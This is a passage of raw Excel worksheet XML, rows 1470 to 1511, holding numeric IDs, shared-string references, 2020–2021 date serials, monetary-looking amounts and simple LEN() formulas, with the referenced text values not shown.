        <f>LEN(J1469)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1470" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1470">
        <v>16707</v>
      </c>
      <c r="B1470">
        <v>1238</v>
      </c>
      <c r="C1470" t="s">
        <v>344</v>
      </c>
      <c r="D1470" t="s">
        <v>9467</v>
      </c>
      <c r="E1470">
        <v>16</v>
      </c>
      <c r="F1470" t="s">
        <v>9484</v>
      </c>
      <c r="G1470" s="1">
        <v>43941</v>
      </c>
      <c r="H1470">
        <v>860000</v>
      </c>
      <c r="I1470" t="s">
        <v>9485</v>
      </c>
      <c r="K1470">
        <f>LEN(I1470)</f>
        <v>18</v>
      </c>
      <c r="L1470">
        <f>LEN(J1470)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1471" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1471">
        <v>16708</v>
      </c>
      <c r="B1471">
        <v>1238</v>
      </c>
      <c r="C1471" t="s">
        <v>344</v>
      </c>
      <c r="D1471" t="s">
        <v>9467</v>
      </c>
      <c r="E1471">
        <v>16</v>
      </c>
      <c r="F1471" t="s">
        <v>9486</v>
      </c>
      <c r="G1471" s="1">
        <v>43941</v>
      </c>
      <c r="H1471">
        <v>480000</v>
      </c>
      <c r="I1471" t="s">
        <v>9485</v>
      </c>
      <c r="K1471">
        <f>LEN(I1471)</f>
        <v>18</v>
      </c>
      <c r="L1471">
        <f>LEN(J1471)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1472" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1472">
        <v>17230</v>
      </c>
      <c r="B1472">
        <v>2306</v>
      </c>
      <c r="C1472" t="s">
        <v>6827</v>
      </c>
      <c r="D1472" t="s">
        <v>9737</v>
      </c>
      <c r="E1472">
        <v>16</v>
      </c>
      <c r="F1472" t="s">
        <v>9437</v>
      </c>
      <c r="G1472" s="1">
        <v>43857</v>
      </c>
      <c r="H1472">
        <v>100000</v>
      </c>
      <c r="I1472" t="s">
        <v>9738</v>
      </c>
      <c r="K1472">
        <f>LEN(I1472)</f>
        <v>18</v>
      </c>
      <c r="L1472">
        <f>LEN(J1472)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1473" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1473">
        <v>17283</v>
      </c>
      <c r="B1473">
        <v>2266</v>
      </c>
      <c r="C1473" t="s">
        <v>16381</v>
      </c>
      <c r="D1473" t="s">
        <v>16382</v>
      </c>
      <c r="E1473">
        <v>12</v>
      </c>
      <c r="F1473" t="s">
        <v>9758</v>
      </c>
      <c r="G1473" s="1">
        <v>43899</v>
      </c>
      <c r="H1473" s="4">
        <v>7000000</v>
      </c>
      <c r="I1473" t="s">
        <v>9485</v>
      </c>
      <c r="K1473">
        <f>LEN(I1473)</f>
        <v>18</v>
      </c>
      <c r="L1473">
        <f>LEN(J1473)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1474" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1474">
        <v>17285</v>
      </c>
      <c r="B1474">
        <v>2266</v>
      </c>
      <c r="C1474" t="s">
        <v>16381</v>
      </c>
      <c r="D1474" t="s">
        <v>16382</v>
      </c>
      <c r="E1474">
        <v>12</v>
      </c>
      <c r="F1474" t="s">
        <v>9437</v>
      </c>
      <c r="G1474" s="1">
        <v>43899</v>
      </c>
      <c r="H1474" s="4">
        <v>7000000</v>
      </c>
      <c r="I1474" t="s">
        <v>9485</v>
      </c>
      <c r="K1474">
        <f>LEN(I1474)</f>
        <v>18</v>
      </c>
      <c r="L1474">
        <f>LEN(J1474)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1475" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1475">
        <v>17286</v>
      </c>
      <c r="B1475">
        <v>2266</v>
      </c>
      <c r="C1475" t="s">
        <v>16381</v>
      </c>
      <c r="D1475" t="s">
        <v>16382</v>
      </c>
      <c r="E1475">
        <v>12</v>
      </c>
      <c r="F1475" t="s">
        <v>9759</v>
      </c>
      <c r="G1475" s="1">
        <v>43899</v>
      </c>
      <c r="H1475" s="4">
        <v>7000000</v>
      </c>
      <c r="I1475" t="s">
        <v>9485</v>
      </c>
      <c r="K1475">
        <f>LEN(I1475)</f>
        <v>18</v>
      </c>
      <c r="L1475">
        <f>LEN(J1475)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1476" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1476">
        <v>17875</v>
      </c>
      <c r="B1476">
        <v>67</v>
      </c>
      <c r="C1476" t="s">
        <v>291</v>
      </c>
      <c r="D1476" t="s">
        <v>9823</v>
      </c>
      <c r="E1476">
        <v>12</v>
      </c>
      <c r="F1476" t="s">
        <v>9824</v>
      </c>
      <c r="G1476" s="1">
        <v>43874</v>
      </c>
      <c r="H1476">
        <v>100000</v>
      </c>
      <c r="I1476" t="s">
        <v>9550</v>
      </c>
      <c r="K1476">
        <f>LEN(I1476)</f>
        <v>18</v>
      </c>
      <c r="L1476">
        <f>LEN(J1476)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1477" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1477">
        <v>19480</v>
      </c>
      <c r="B1477">
        <v>300</v>
      </c>
      <c r="C1477" t="s">
        <v>392</v>
      </c>
      <c r="D1477" t="s">
        <v>10076</v>
      </c>
      <c r="E1477">
        <v>12</v>
      </c>
      <c r="F1477" t="s">
        <v>9925</v>
      </c>
      <c r="G1477" s="1">
        <v>43871</v>
      </c>
      <c r="H1477">
        <v>250000</v>
      </c>
      <c r="I1477" t="s">
        <v>9550</v>
      </c>
      <c r="K1477">
        <f>LEN(I1477)</f>
        <v>18</v>
      </c>
      <c r="L1477">
        <f>LEN(J1477)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1478" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1478">
        <v>19481</v>
      </c>
      <c r="B1478">
        <v>300</v>
      </c>
      <c r="C1478" t="s">
        <v>392</v>
      </c>
      <c r="D1478" t="s">
        <v>10076</v>
      </c>
      <c r="E1478">
        <v>12</v>
      </c>
      <c r="F1478" t="s">
        <v>8913</v>
      </c>
      <c r="G1478" s="1">
        <v>43871</v>
      </c>
      <c r="H1478">
        <v>100000</v>
      </c>
      <c r="I1478" t="s">
        <v>9550</v>
      </c>
      <c r="K1478">
        <f>LEN(I1478)</f>
        <v>18</v>
      </c>
      <c r="L1478">
        <f>LEN(J1478)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1479" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1479">
        <v>19800</v>
      </c>
      <c r="B1479">
        <v>226</v>
      </c>
      <c r="C1479" t="s">
        <v>502</v>
      </c>
      <c r="D1479" t="s">
        <v>10242</v>
      </c>
      <c r="E1479">
        <v>16</v>
      </c>
      <c r="F1479" t="s">
        <v>10248</v>
      </c>
      <c r="G1479" s="1">
        <v>43922</v>
      </c>
      <c r="H1479">
        <v>152128</v>
      </c>
      <c r="I1479" t="s">
        <v>9550</v>
      </c>
      <c r="K1479">
        <f>LEN(I1479)</f>
        <v>18</v>
      </c>
      <c r="L1479">
        <f>LEN(J1479)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1480" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1480">
        <v>19801</v>
      </c>
      <c r="B1480">
        <v>226</v>
      </c>
      <c r="C1480" t="s">
        <v>502</v>
      </c>
      <c r="D1480" t="s">
        <v>10242</v>
      </c>
      <c r="E1480">
        <v>16</v>
      </c>
      <c r="F1480" t="s">
        <v>10249</v>
      </c>
      <c r="G1480" s="1">
        <v>43922</v>
      </c>
      <c r="H1480">
        <v>253416</v>
      </c>
      <c r="I1480" t="s">
        <v>9550</v>
      </c>
      <c r="K1480">
        <f>LEN(I1480)</f>
        <v>18</v>
      </c>
      <c r="L1480">
        <f>LEN(J1480)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1481" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1481">
        <v>19802</v>
      </c>
      <c r="B1481">
        <v>226</v>
      </c>
      <c r="C1481" t="s">
        <v>502</v>
      </c>
      <c r="D1481" t="s">
        <v>10242</v>
      </c>
      <c r="E1481">
        <v>16</v>
      </c>
      <c r="F1481" t="s">
        <v>10250</v>
      </c>
      <c r="G1481" s="1">
        <v>43922</v>
      </c>
      <c r="H1481">
        <v>158261</v>
      </c>
      <c r="I1481" t="s">
        <v>9550</v>
      </c>
      <c r="K1481">
        <f>LEN(I1481)</f>
        <v>18</v>
      </c>
      <c r="L1481">
        <f>LEN(J1481)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1482" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1482">
        <v>19870</v>
      </c>
      <c r="B1482">
        <v>290</v>
      </c>
      <c r="C1482" t="s">
        <v>98</v>
      </c>
      <c r="D1482" t="s">
        <v>10292</v>
      </c>
      <c r="E1482">
        <v>12</v>
      </c>
      <c r="F1482" t="s">
        <v>10293</v>
      </c>
      <c r="G1482" s="1">
        <v>43892</v>
      </c>
      <c r="H1482">
        <v>350</v>
      </c>
      <c r="I1482" t="s">
        <v>9485</v>
      </c>
      <c r="K1482">
        <f>LEN(I1482)</f>
        <v>18</v>
      </c>
      <c r="L1482">
        <f>LEN(J1482)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1483" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1483">
        <v>19875</v>
      </c>
      <c r="B1483">
        <v>290</v>
      </c>
      <c r="C1483" t="s">
        <v>98</v>
      </c>
      <c r="D1483" t="s">
        <v>10292</v>
      </c>
      <c r="E1483">
        <v>12</v>
      </c>
      <c r="F1483" t="s">
        <v>10296</v>
      </c>
      <c r="G1483" s="1">
        <v>43892</v>
      </c>
      <c r="H1483">
        <v>500</v>
      </c>
      <c r="I1483" t="s">
        <v>9485</v>
      </c>
      <c r="K1483">
        <f>LEN(I1483)</f>
        <v>18</v>
      </c>
      <c r="L1483">
        <f>LEN(J1483)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1484" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1484">
        <v>19957</v>
      </c>
      <c r="B1484">
        <v>300</v>
      </c>
      <c r="C1484" t="s">
        <v>392</v>
      </c>
      <c r="D1484" t="s">
        <v>10351</v>
      </c>
      <c r="E1484">
        <v>12</v>
      </c>
      <c r="F1484" t="s">
        <v>9435</v>
      </c>
      <c r="G1484" s="1">
        <v>43873</v>
      </c>
      <c r="H1484">
        <v>250000</v>
      </c>
      <c r="I1484" t="s">
        <v>9550</v>
      </c>
      <c r="K1484">
        <f>LEN(I1484)</f>
        <v>18</v>
      </c>
      <c r="L1484">
        <f>LEN(J1484)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1485" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1485">
        <v>19983</v>
      </c>
      <c r="B1485">
        <v>337</v>
      </c>
      <c r="C1485" t="s">
        <v>634</v>
      </c>
      <c r="D1485" t="s">
        <v>10372</v>
      </c>
      <c r="E1485">
        <v>13</v>
      </c>
      <c r="F1485" t="s">
        <v>10373</v>
      </c>
      <c r="G1485" s="1">
        <v>43991</v>
      </c>
      <c r="H1485">
        <v>946945</v>
      </c>
      <c r="I1485" t="s">
        <v>10374</v>
      </c>
      <c r="K1485">
        <f>LEN(I1485)</f>
        <v>18</v>
      </c>
      <c r="L1485">
        <f>LEN(J1485)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1486" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1486">
        <v>20059</v>
      </c>
      <c r="B1486">
        <v>561</v>
      </c>
      <c r="C1486" t="s">
        <v>606</v>
      </c>
      <c r="D1486" t="s">
        <v>10446</v>
      </c>
      <c r="E1486">
        <v>24</v>
      </c>
      <c r="F1486" t="s">
        <v>609</v>
      </c>
      <c r="G1486" s="1">
        <v>43949</v>
      </c>
      <c r="H1486">
        <v>1900000</v>
      </c>
      <c r="I1486" t="s">
        <v>9550</v>
      </c>
      <c r="K1486">
        <f>LEN(I1486)</f>
        <v>18</v>
      </c>
      <c r="L1486">
        <f>LEN(J1486)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1487" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1487">
        <v>20155</v>
      </c>
      <c r="B1487">
        <v>2564</v>
      </c>
      <c r="C1487" t="s">
        <v>5276</v>
      </c>
      <c r="D1487" t="s">
        <v>10210</v>
      </c>
      <c r="E1487">
        <v>12</v>
      </c>
      <c r="F1487" t="s">
        <v>10515</v>
      </c>
      <c r="G1487" s="1">
        <v>43885</v>
      </c>
      <c r="H1487">
        <v>450000</v>
      </c>
      <c r="I1487" t="s">
        <v>9485</v>
      </c>
      <c r="K1487">
        <f>LEN(I1487)</f>
        <v>18</v>
      </c>
      <c r="L1487">
        <f>LEN(J1487)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1488" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1488">
        <v>20174</v>
      </c>
      <c r="B1488">
        <v>371</v>
      </c>
      <c r="C1488" t="s">
        <v>770</v>
      </c>
      <c r="D1488" t="s">
        <v>10525</v>
      </c>
      <c r="E1488">
        <v>12</v>
      </c>
      <c r="F1488" t="s">
        <v>10526</v>
      </c>
      <c r="G1488" s="1">
        <v>43941</v>
      </c>
      <c r="H1488">
        <v>500</v>
      </c>
      <c r="I1488" t="s">
        <v>9550</v>
      </c>
      <c r="K1488">
        <f>LEN(I1488)</f>
        <v>18</v>
      </c>
      <c r="L1488">
        <f>LEN(J1488)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1489" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1489">
        <v>20175</v>
      </c>
      <c r="B1489">
        <v>371</v>
      </c>
      <c r="C1489" t="s">
        <v>770</v>
      </c>
      <c r="D1489" t="s">
        <v>10525</v>
      </c>
      <c r="E1489">
        <v>12</v>
      </c>
      <c r="F1489" t="s">
        <v>10527</v>
      </c>
      <c r="G1489" s="1">
        <v>43941</v>
      </c>
      <c r="H1489">
        <v>17000</v>
      </c>
      <c r="I1489" t="s">
        <v>9550</v>
      </c>
      <c r="K1489">
        <f>LEN(I1489)</f>
        <v>18</v>
      </c>
      <c r="L1489">
        <f>LEN(J1489)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1490" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1490">
        <v>20177</v>
      </c>
      <c r="B1490">
        <v>371</v>
      </c>
      <c r="C1490" t="s">
        <v>770</v>
      </c>
      <c r="D1490" t="s">
        <v>10525</v>
      </c>
      <c r="E1490">
        <v>12</v>
      </c>
      <c r="F1490" t="s">
        <v>9523</v>
      </c>
      <c r="G1490" s="1">
        <v>43941</v>
      </c>
      <c r="H1490">
        <v>800</v>
      </c>
      <c r="I1490" t="s">
        <v>9550</v>
      </c>
      <c r="K1490">
        <f>LEN(I1490)</f>
        <v>18</v>
      </c>
      <c r="L1490">
        <f>LEN(J1490)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1491" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1491">
        <v>20178</v>
      </c>
      <c r="B1491">
        <v>371</v>
      </c>
      <c r="C1491" t="s">
        <v>770</v>
      </c>
      <c r="D1491" t="s">
        <v>10525</v>
      </c>
      <c r="E1491">
        <v>12</v>
      </c>
      <c r="F1491" t="s">
        <v>9438</v>
      </c>
      <c r="G1491" s="1">
        <v>43941</v>
      </c>
      <c r="H1491">
        <v>500</v>
      </c>
      <c r="I1491" t="s">
        <v>9550</v>
      </c>
      <c r="K1491">
        <f>LEN(I1491)</f>
        <v>18</v>
      </c>
      <c r="L1491">
        <f>LEN(J1491)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1492" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1492">
        <v>20209</v>
      </c>
      <c r="B1492">
        <v>2278</v>
      </c>
      <c r="C1492" t="s">
        <v>4811</v>
      </c>
      <c r="D1492" t="s">
        <v>10554</v>
      </c>
      <c r="E1492">
        <v>1</v>
      </c>
      <c r="F1492" t="s">
        <v>9437</v>
      </c>
      <c r="G1492" s="1">
        <v>44039</v>
      </c>
      <c r="H1492">
        <v>180000</v>
      </c>
      <c r="I1492" t="s">
        <v>9550</v>
      </c>
      <c r="K1492">
        <f>LEN(I1492)</f>
        <v>18</v>
      </c>
      <c r="L1492">
        <f>LEN(J1492)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1493" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1493">
        <v>20260</v>
      </c>
      <c r="B1493">
        <v>596</v>
      </c>
      <c r="C1493" t="s">
        <v>835</v>
      </c>
      <c r="D1493" t="s">
        <v>10583</v>
      </c>
      <c r="E1493">
        <v>12</v>
      </c>
      <c r="F1493" t="s">
        <v>9925</v>
      </c>
      <c r="G1493" s="1">
        <v>43959</v>
      </c>
      <c r="H1493">
        <v>1000</v>
      </c>
      <c r="I1493" t="s">
        <v>9550</v>
      </c>
      <c r="K1493">
        <f>LEN(I1493)</f>
        <v>18</v>
      </c>
      <c r="L1493">
        <f>LEN(J1493)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1494" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1494">
        <v>20392</v>
      </c>
      <c r="B1494">
        <v>318</v>
      </c>
      <c r="C1494" t="s">
        <v>953</v>
      </c>
      <c r="D1494" t="s">
        <v>10686</v>
      </c>
      <c r="E1494">
        <v>27</v>
      </c>
      <c r="F1494" t="s">
        <v>9447</v>
      </c>
      <c r="G1494" s="1">
        <v>43969</v>
      </c>
      <c r="H1494">
        <v>0</v>
      </c>
      <c r="I1494" t="s">
        <v>9550</v>
      </c>
      <c r="K1494">
        <f>LEN(I1494)</f>
        <v>18</v>
      </c>
      <c r="L1494">
        <f>LEN(J1494)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1495" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1495">
        <v>20395</v>
      </c>
      <c r="B1495">
        <v>318</v>
      </c>
      <c r="C1495" t="s">
        <v>953</v>
      </c>
      <c r="D1495" t="s">
        <v>10686</v>
      </c>
      <c r="E1495">
        <v>27</v>
      </c>
      <c r="F1495" t="s">
        <v>9446</v>
      </c>
      <c r="G1495" s="1">
        <v>43969</v>
      </c>
      <c r="H1495">
        <v>0</v>
      </c>
      <c r="I1495" t="s">
        <v>9550</v>
      </c>
      <c r="K1495">
        <f>LEN(I1495)</f>
        <v>18</v>
      </c>
      <c r="L1495">
        <f>LEN(J1495)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1496" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1496">
        <v>20397</v>
      </c>
      <c r="B1496">
        <v>318</v>
      </c>
      <c r="C1496" t="s">
        <v>953</v>
      </c>
      <c r="D1496" t="s">
        <v>10686</v>
      </c>
      <c r="E1496">
        <v>27</v>
      </c>
      <c r="F1496" t="s">
        <v>9900</v>
      </c>
      <c r="G1496" s="1">
        <v>43969</v>
      </c>
      <c r="H1496">
        <v>0</v>
      </c>
      <c r="I1496" t="s">
        <v>9550</v>
      </c>
      <c r="K1496">
        <f>LEN(I1496)</f>
        <v>18</v>
      </c>
      <c r="L1496">
        <f>LEN(J1496)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1497" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1497">
        <v>20508</v>
      </c>
      <c r="B1497">
        <v>915</v>
      </c>
      <c r="C1497" t="s">
        <v>16383</v>
      </c>
      <c r="D1497" t="s">
        <v>16384</v>
      </c>
      <c r="E1497">
        <v>29</v>
      </c>
      <c r="F1497" t="s">
        <v>10589</v>
      </c>
      <c r="G1497" s="1">
        <v>43944</v>
      </c>
      <c r="H1497" s="4">
        <v>300000</v>
      </c>
      <c r="I1497" t="s">
        <v>9550</v>
      </c>
      <c r="K1497">
        <f>LEN(I1497)</f>
        <v>18</v>
      </c>
      <c r="L1497">
        <f>LEN(J1497)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1498" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1498">
        <v>20509</v>
      </c>
      <c r="B1498">
        <v>915</v>
      </c>
      <c r="C1498" t="s">
        <v>16383</v>
      </c>
      <c r="D1498" t="s">
        <v>16384</v>
      </c>
      <c r="E1498">
        <v>29</v>
      </c>
      <c r="F1498" t="s">
        <v>10759</v>
      </c>
      <c r="G1498" s="1">
        <v>43944</v>
      </c>
      <c r="H1498" s="4">
        <v>120000</v>
      </c>
      <c r="I1498" t="s">
        <v>9550</v>
      </c>
      <c r="K1498">
        <f>LEN(I1498)</f>
        <v>18</v>
      </c>
      <c r="L1498">
        <f>LEN(J1498)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1499" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1499">
        <v>20534</v>
      </c>
      <c r="B1499">
        <v>771</v>
      </c>
      <c r="C1499" t="s">
        <v>1045</v>
      </c>
      <c r="D1499" t="s">
        <v>10776</v>
      </c>
      <c r="E1499">
        <v>11</v>
      </c>
      <c r="F1499" t="s">
        <v>10781</v>
      </c>
      <c r="G1499" s="1">
        <v>44011</v>
      </c>
      <c r="H1499">
        <v>20000</v>
      </c>
      <c r="I1499" t="s">
        <v>9550</v>
      </c>
      <c r="K1499">
        <f>LEN(I1499)</f>
        <v>18</v>
      </c>
      <c r="L1499">
        <f>LEN(J1499)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1500" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1500">
        <v>20574</v>
      </c>
      <c r="B1500">
        <v>992</v>
      </c>
      <c r="C1500" t="s">
        <v>3006</v>
      </c>
      <c r="D1500" t="s">
        <v>10821</v>
      </c>
      <c r="E1500">
        <v>29</v>
      </c>
      <c r="F1500" t="s">
        <v>10822</v>
      </c>
      <c r="G1500" s="1">
        <v>43948</v>
      </c>
      <c r="H1500">
        <v>1000000</v>
      </c>
      <c r="I1500" t="s">
        <v>9550</v>
      </c>
      <c r="K1500">
        <f>LEN(I1500)</f>
        <v>18</v>
      </c>
      <c r="L1500">
        <f>LEN(J1500)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1501" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1501">
        <v>20748</v>
      </c>
      <c r="B1501">
        <v>2685</v>
      </c>
      <c r="C1501" t="s">
        <v>5899</v>
      </c>
      <c r="D1501" t="s">
        <v>10954</v>
      </c>
      <c r="E1501">
        <v>25</v>
      </c>
      <c r="F1501" t="s">
        <v>9437</v>
      </c>
      <c r="G1501" s="1">
        <v>44001</v>
      </c>
      <c r="H1501">
        <v>10000</v>
      </c>
      <c r="I1501" t="s">
        <v>9550</v>
      </c>
      <c r="K1501">
        <f>LEN(I1501)</f>
        <v>18</v>
      </c>
      <c r="L1501">
        <f>LEN(J1501)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1502" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1502">
        <v>20749</v>
      </c>
      <c r="B1502">
        <v>2685</v>
      </c>
      <c r="C1502" t="s">
        <v>5899</v>
      </c>
      <c r="D1502" t="s">
        <v>10954</v>
      </c>
      <c r="E1502">
        <v>25</v>
      </c>
      <c r="F1502" t="s">
        <v>609</v>
      </c>
      <c r="G1502" s="1">
        <v>44001</v>
      </c>
      <c r="H1502">
        <v>10000</v>
      </c>
      <c r="I1502" t="s">
        <v>9550</v>
      </c>
      <c r="K1502">
        <f>LEN(I1502)</f>
        <v>18</v>
      </c>
      <c r="L1502">
        <f>LEN(J1502)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1503" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1503">
        <v>20750</v>
      </c>
      <c r="B1503">
        <v>2685</v>
      </c>
      <c r="C1503" t="s">
        <v>5899</v>
      </c>
      <c r="D1503" t="s">
        <v>10954</v>
      </c>
      <c r="E1503">
        <v>25</v>
      </c>
      <c r="F1503" t="s">
        <v>10955</v>
      </c>
      <c r="G1503" s="1">
        <v>44001</v>
      </c>
      <c r="H1503">
        <v>10000</v>
      </c>
      <c r="I1503" t="s">
        <v>9550</v>
      </c>
      <c r="K1503">
        <f>LEN(I1503)</f>
        <v>18</v>
      </c>
      <c r="L1503">
        <f>LEN(J1503)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1504" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1504">
        <v>20752</v>
      </c>
      <c r="B1504">
        <v>2685</v>
      </c>
      <c r="C1504" t="s">
        <v>5899</v>
      </c>
      <c r="D1504" t="s">
        <v>10954</v>
      </c>
      <c r="E1504">
        <v>25</v>
      </c>
      <c r="F1504" t="s">
        <v>9586</v>
      </c>
      <c r="G1504" s="1">
        <v>44001</v>
      </c>
      <c r="H1504">
        <v>10000</v>
      </c>
      <c r="I1504" t="s">
        <v>9550</v>
      </c>
      <c r="K1504">
        <f>LEN(I1504)</f>
        <v>18</v>
      </c>
      <c r="L1504">
        <f>LEN(J1504)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1505" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1505">
        <v>20755</v>
      </c>
      <c r="B1505">
        <v>2685</v>
      </c>
      <c r="C1505" t="s">
        <v>5899</v>
      </c>
      <c r="D1505" t="s">
        <v>10954</v>
      </c>
      <c r="E1505">
        <v>25</v>
      </c>
      <c r="F1505" t="s">
        <v>1746</v>
      </c>
      <c r="G1505" s="1">
        <v>44001</v>
      </c>
      <c r="H1505">
        <v>10000</v>
      </c>
      <c r="I1505" t="s">
        <v>9550</v>
      </c>
      <c r="K1505">
        <f>LEN(I1505)</f>
        <v>18</v>
      </c>
      <c r="L1505">
        <f>LEN(J1505)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1506" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1506">
        <v>20756</v>
      </c>
      <c r="B1506">
        <v>2685</v>
      </c>
      <c r="C1506" t="s">
        <v>5899</v>
      </c>
      <c r="D1506" t="s">
        <v>10954</v>
      </c>
      <c r="E1506">
        <v>25</v>
      </c>
      <c r="F1506" t="s">
        <v>9435</v>
      </c>
      <c r="G1506" s="1">
        <v>44001</v>
      </c>
      <c r="H1506">
        <v>10000</v>
      </c>
      <c r="I1506" t="s">
        <v>9550</v>
      </c>
      <c r="K1506">
        <f>LEN(I1506)</f>
        <v>18</v>
      </c>
      <c r="L1506">
        <f>LEN(J1506)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1507" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1507">
        <v>20830</v>
      </c>
      <c r="B1507">
        <v>734</v>
      </c>
      <c r="C1507" t="s">
        <v>1261</v>
      </c>
      <c r="D1507" t="s">
        <v>11015</v>
      </c>
      <c r="E1507">
        <v>2</v>
      </c>
      <c r="F1507" t="s">
        <v>11016</v>
      </c>
      <c r="G1507" s="1">
        <v>44000</v>
      </c>
      <c r="H1507">
        <v>0</v>
      </c>
      <c r="I1507" t="s">
        <v>11017</v>
      </c>
      <c r="K1507">
        <f>LEN(I1507)</f>
        <v>18</v>
      </c>
      <c r="L1507">
        <f>LEN(J1507)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1508" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1508">
        <v>20831</v>
      </c>
      <c r="B1508">
        <v>734</v>
      </c>
      <c r="C1508" t="s">
        <v>1261</v>
      </c>
      <c r="D1508" t="s">
        <v>11015</v>
      </c>
      <c r="E1508">
        <v>2</v>
      </c>
      <c r="F1508" t="s">
        <v>764</v>
      </c>
      <c r="G1508" s="1">
        <v>44000</v>
      </c>
      <c r="H1508">
        <v>0</v>
      </c>
      <c r="I1508" t="s">
        <v>11017</v>
      </c>
      <c r="K1508">
        <f>LEN(I1508)</f>
        <v>18</v>
      </c>
      <c r="L1508">
        <f>LEN(J1508)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1509" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1509">
        <v>20832</v>
      </c>
      <c r="B1509">
        <v>734</v>
      </c>
      <c r="C1509" t="s">
        <v>1261</v>
      </c>
      <c r="D1509" t="s">
        <v>11015</v>
      </c>
      <c r="E1509">
        <v>2</v>
      </c>
      <c r="F1509" t="s">
        <v>11018</v>
      </c>
      <c r="G1509" s="1">
        <v>44000</v>
      </c>
      <c r="H1509">
        <v>41751</v>
      </c>
      <c r="I1509" t="s">
        <v>11017</v>
      </c>
      <c r="K1509">
        <f>LEN(I1509)</f>
        <v>18</v>
      </c>
      <c r="L1509">
        <f>LEN(J1509)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1510" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1510">
        <v>20898</v>
      </c>
      <c r="B1510">
        <v>514</v>
      </c>
      <c r="C1510" t="s">
        <v>1327</v>
      </c>
      <c r="D1510" t="s">
        <v>11048</v>
      </c>
      <c r="E1510">
        <v>29</v>
      </c>
      <c r="F1510" t="s">
        <v>10589</v>
      </c>
      <c r="G1510" s="1">
        <v>43985</v>
      </c>
      <c r="H1510">
        <v>1200000</v>
      </c>
      <c r="I1510" t="s">
        <v>9550</v>
      </c>
      <c r="K1510">
        <f>LEN(I1510)</f>
        <v>18</v>
      </c>
      <c r="L1510">
        <f>LEN(J1510)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1511" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1511">
        <v>21049</v>
      </c>
      <c r="B1511">
        <v>2578</v>
      </c>
      <c r="C1511" t="s">
        <v>5120</v>
      </c>
      <c r="D1511" t="s">
        <v>11115</v>
      </c>
      <c r="E1511">
        <v>34</v>
      </c>
      <c r="F1511" t="s">
        <v>1746</v>
      </c>
      <c r="G1511" s="1">
        <v>44351</v>
      </c>
      <c r="H1511">
